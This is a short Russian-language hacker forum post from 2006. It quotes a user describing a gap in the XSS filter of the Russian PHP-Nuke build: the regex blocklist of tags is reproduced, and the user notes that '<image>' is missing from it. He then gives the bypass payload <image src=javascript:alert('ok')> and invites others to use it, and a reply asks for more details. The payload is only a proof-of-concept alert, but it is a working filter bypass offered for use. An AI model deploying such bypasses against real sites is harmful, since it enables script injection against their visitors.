
24.02.2006, 00:32
|
|
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
С нами:
11133086
Репутация:
241
|
|
Сообщение от Dr0ne
я просмотрел код нюки на русском на нашел брешь в проверке на XSS
PHP код:
if (!defined('ADMIN_FILE')) { foreach ($_GET as $sec_key => $secvalue) { if ((eregi("<*script*\"?*>", $secvalue)) || (eregi("<*object*\"?*>", $secvalue)) || (eregi("<*iframe*\"?*>", $secvalue)) || (eregi("<*applet*\"?*>", $secvalue)) || (eregi("<*meta*\"?*>", $secvalue)) || (eregi("<*style*\"?*>", $secvalue)) || (eregi("<*form*\"?*>", $secvalue)) || (eregi("<*img*\"?*>", $secvalue)) || (eregi("<*onmouseover*\"?*>", $secvalue)) || (eregi("\(*\"?*\)", $secvalue)) || (eregi("\"", $secvalue)) || (eregi("forum_admin", $sec_key)) || (eregi("inside_mod", $sec_key))) {
тут нет проверки на тэг <image >
атаку можно провести так
Код HTML:
<image src=javascript:alert('ok')>
пользуйтесь. будут вопросы - обращайтесь
RE конечно, но хотелось бы немного поподробнее....
|
|
|